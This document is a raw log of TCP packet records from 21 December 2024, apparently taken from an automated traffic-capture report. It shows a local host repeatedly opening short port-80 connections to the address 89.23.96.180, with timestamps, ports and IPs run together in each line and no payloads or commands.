                                                                                  Dec 21, 2024 10:03:36.396311045 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.437199116 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.514370918 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.518342018 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.518682957 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.638288975 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.638478994 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.638515949 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.638793945 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.638823032 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:36.758544922 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.987864017 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:37.129415989 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:37.129509926 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:37.129539967 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.014162064 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.062244892 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.248359919 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.296607971 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.376172066 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.376533031 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.496129990 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.496160030 CET804993289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.496371984 CET4993280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.496414900 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.496766090 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.616421938 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.843765974 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:38.964241028 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.964380980 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:38.964401960 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.422619104 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.422679901 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.542217970 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.542326927 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.542536974 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.542537928 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.542671919 CET804993889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.542735100 CET4993880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.662101030 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.662189007 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.662256002 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.662297010 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:39.781729937 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:39.890510082 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:40.015459061 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:40.043288946 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.044361115 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.135234118 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.135446072 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.135474920 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.919259071 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:40.968522072 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.040293932 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.093477011 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.156363964 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.202862978 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.272377968 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.312331915 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.388020039 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.388358116 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.388454914 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.507910013 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.507925987 CET804993989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.508018017 CET4993980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.508035898 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.508147001 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.508575916 CET804994089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.508651018 CET4994080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.628747940 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.859224081 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:41.982741117 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.982757092 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:41.982834101 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:42.885377884 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:42.937191963 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.120584011 CET804994689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:43.171596050 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.247113943 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.366795063 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:43.366899967 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.367108107 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.486829996 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:43.718601942 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:43.838484049 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:43.838500977 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:43.838514090 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:44.746711969 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:44.796595097 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:44.980382919 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.031049967 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.109323025 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.109596968 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.229521990 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.229556084 CET804995289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.229618073 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.229650974 CET4995280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.229773998 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.349347115 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.578068972 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:45.699172020 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.699208021 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:45.699237108 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.172609091 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.172908068 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.292951107 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.293044090 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.293195009 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.293251038 CET804995889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.293349981 CET4995880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.308212996 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.412760019 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.427766085 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.427849054 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.428020954 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.547512054 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.640572071 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.761822939 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.761858940 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.781085968 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:46.900799990 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.900859118 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:46.900887966 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:47.672502995 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:47.718462944 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:47.806485891 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:47.859234095 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:47.908140898 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:47.952944994 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.044274092 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.084422112 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.170670986 CET4994680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.174407005 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.174499035 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.174832106 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.294301987 CET804995989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.294399023 CET4995980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.294405937 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.294491053 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.294667006 CET804996089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.294677019 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.294728994 CET4996080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.414232969 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.640434980 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:48.761162996 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.761200905 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:48.761230946 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:49.673124075 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:49.718456030 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:49.908051968 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:49.952831984 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.026238918 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.026464939 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.146174908 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:50.146392107 CET804996689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:50.146497011 CET4996680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.146508932 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.147106886 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.266633034 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:50.499782085 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:50.619699955 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:50.619762897 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:50.619793892 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:51.523997068 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:51.577893019 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.756331921 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:51.796607018 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.874397039 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.874644995 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.994245052 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:51.994366884 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.994523048 CET804997289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:51.994601011 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:51.994973898 CET4997280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:52.115552902 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:52.343694925 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:52.463407040 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:52.463496923 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:52.463514090 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:52.963239908 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:52.965719938 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.105254889 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.105292082 CET804997889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.105371952 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.105405092 CET4997880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.106097937 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.158695936 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.227463007 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.279916048 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.280024052 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.280339956 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.399889946 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.453059912 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.573533058 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.574273109 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.624950886 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:53.744798899 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.744833946 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:53.744887114 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:54.486151934 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:54.531013966 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:54.656378031 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:54.702852964 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:54.720328093 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:54.765347958 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:54.892455101 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:54.937225103 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.017296076 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.017349958 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.017685890 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.137356043 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.137466908 CET804997989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.137516975 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.137540102 CET4997980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.137728930 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.137904882 CET804998589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.138219118 CET4998580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.257647038 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.513958931 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:55.633785963 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.633934021 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:55.633964062 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:56.514733076 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:56.562228918 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:56.748373985 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:56.748763084 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:56.868896008 CET804998689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:56.868973970 CET4998680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:56.872056961 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:56.991796017 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:56.993843079 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:56.993843079 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:57.113483906 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:57.343554020 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:57.463258982 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:57.463294983 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:57.463347912 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:58.380250931 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:58.421607018 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.614343882 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:58.655972004 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.732322931 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.732604980 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.852556944 CET804999289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:58.852689981 CET4999280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.896442890 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:58.896558046 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:58.896707058 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.017508030 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.249995947 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.369884014 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.369920969 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.369951010 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.735109091 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.735116959 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.855640888 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.855803967 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.855909109 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.856785059 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.896085978 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.936491013 CET804999889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.936737061 CET4999880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.977583885 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.978146076 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:59.978234053 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:59.978409052 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:00.098136902 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:00.202969074 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:00.322736979 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:00.322770119 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:00.328082085 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:00.447954893 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:00.447973967 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:00.447988987 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.236602068 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.281296015 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.354269028 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.407234907 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.472637892 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.519259930 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.588186026 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.641391039 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.714021921 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.714209080 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.714386940 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.834331989 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.834367990 CET805000489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.834435940 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.834501028 CET5000480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.834629059 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.835253954 CET805000589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:01.837030888 CET5000580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:01.954265118 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:02.187351942 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:02.307358980 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:02.307403088 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:02.307432890 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:03.209317923 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:03.249711990 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.444094896 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:03.446222067 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.558784008 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.566623926 CET805000689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:03.567265034 CET5000680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.678683043 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:03.678792953 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.678956032 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:03.798604012 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:04.031035900 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:04.151093960 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:04.151150942 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:04.151179075 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.056436062 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.109098911 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.296211958 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.343473911 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.416270018 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.416481018 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.536180019 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.536264896 CET805001289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.536359072 CET5001280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.536386967 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.536557913 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:05.656106949 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:05.890415907 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.010178089 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.010242939 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.010272980 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.484811068 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.484841108 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.601943970 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.601948023 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.603239059 CET4982680192.168.2.589.23.96.180
